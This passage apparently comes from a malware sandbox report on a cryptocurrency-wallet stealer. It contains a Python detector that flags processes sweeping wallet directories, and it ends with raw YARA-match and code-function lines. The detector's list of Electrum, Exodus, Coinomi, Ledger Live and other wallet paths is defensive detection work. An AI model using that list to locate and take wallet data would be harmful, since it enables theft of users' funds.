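Wallet paths are taken from the "File opened" entries in the report; the
event records and the allowlist below are constructed assumptions.
"""
import ntpath
import re
from dataclasses import dataclass

# Wallet data directories observed being opened in the report, as regex
# fragments relative to the user profile (raw strings: "\\" is one backslash).
WALLET_DIR_PATTERNS = [
    r"\\AppData\\Roaming\\Electrum\\wallets\\",
    r"\\AppData\\Roaming\\Electrum-LTC\\wallets\\",
    r"\\AppData\\Roaming\\Exodus\\",
    r"\\AppData\\Roaming\\ElectronCash\\wallets\\",
    r"\\AppData\\Roaming\\MultiDoge\\",
    r"\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\",
    r"\\AppData\\Roaming\\Binance\\",
    r"\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\",
    r"\\AppData\\Roaming\\Ledger Live\\",
    r"\\AppData\\Roaming\\atomic_qt\\",
    r"\\AppData\\Roaming\\Guarda\\",
]
WALLET_DIR_RE = re.compile("|".join(WALLET_DIR_PATTERNS), re.IGNORECASE)

# Assumption: image names that legitimately touch these directories (the
# wallet applications themselves plus Explorer). Tune for your environment.
EXPECTED_IMAGES = {
    "electrum.exe", "electrum-ltc.exe", "exodus.exe", "electron-cash.exe",
    "multidoge.exe", "atomic wallet.exe", "binance.exe", "coinomi.exe",
    "ledger live.exe", "atomicdex.exe", "guarda.exe", "explorer.exe",
}


@dataclass(frozen=True)
class FileOpenEvent:
    pid: int
    image: str      # full path of the process image
    target: str     # path the process opened


def is_wallet_path(path: str) -> bool:
    """True if the opened path lies under one of the known wallet directories."""
    return WALLET_DIR_RE.search(path) is not None


def suspicious_events(events):
    """Return (pid, image_name, target) for wallet-directory opens by unexpected images."""
    hits = []
    for ev in events:
        if not is_wallet_path(ev.target):
            continue
        image_name = ntpath.basename(ev.image).lower()
        if image_name in EXPECTED_IMAGES:
            continue
        hits.append((ev.pid, image_name, ev.target))
    return hits


def summarize(events):
    """Count distinct wallet paths per offending process; a single process
    sweeping many wallet directories is the stealer pattern seen above."""
    per_process = {}
    for pid, image, target in suspicious_events(events):
        per_process.setdefault((pid, image), set()).add(target)
    return {key: len(paths) for key, paths in per_process.items()}


# Constructed events mirroring the report: the payload runs inside the .NET
# utility aspnet_regiis.exe (PID 1420 in the report) and sweeps wallet dirs.
INJECTED = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_regiis.exe"
SAMPLE_EVENTS = [
    FileOpenEvent(1420, INJECTED, "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"),
    FileOpenEvent(1420, INJECTED, "C:\\Users\\user\\AppData\\Roaming\\Exodus\\exodus.wallet\\"),
    FileOpenEvent(1420, INJECTED, "C:\\Users\\user\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\"),
    FileOpenEvent(1420, INJECTED, "C:\\Users\\user\\AppData\\Roaming\\Ledger Live\\Local Storage\\leveldb\\"),
    # Unrelated open by the same process: not a wallet path, must not fire.
    FileOpenEvent(1420, INJECTED, "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\"),
    # Benign: the wallet itself and Explorer touching the same directories.
    FileOpenEvent(2210, "C:\\Program Files\\Electrum\\electrum.exe",
                  "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"),
    FileOpenEvent(3300, "C:\\Windows\\explorer.exe",
                  "C:\\Users\\user\\AppData\\Roaming\\Exodus\\"),
]

if __name__ == "__main__":
    for (pid, image), n in summarize(SAMPLE_EVENTS).items():
        print(f"PID {pid} ({image}) opened {n} wallet directories")
```

The per-process count is what makes this useful in practice: a backup agent or the wallet's own updater may legitimately touch one of these directories, but a process that is neither on the allowlist nor a wallet and walks Electrum, Exodus, Coinomi and Ledger Live paths in one run matches the sweep recorded above. Feed it real file-access telemetry (for example Sysmon Event ID 11 or ETW file I/O) by mapping each record onto FileOpenEvent.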

Remote Access Functionality

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.6d5e2000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6d5e2000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.aspnet_regiis.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6d5b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 1420, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC50C40 sqlite3_bind_zeroblob, 3_2_6CC50C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CC50D60 sqlite3_bind_parameter_name, 3_2_6CC50D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CB78EA0 sqlite3_clear_bindings, 3_2_6CB78EA0
[Map legend: number of IPs, in quartile bands (below 25%, 25% to 50%, 50% to 75%, above 75%)]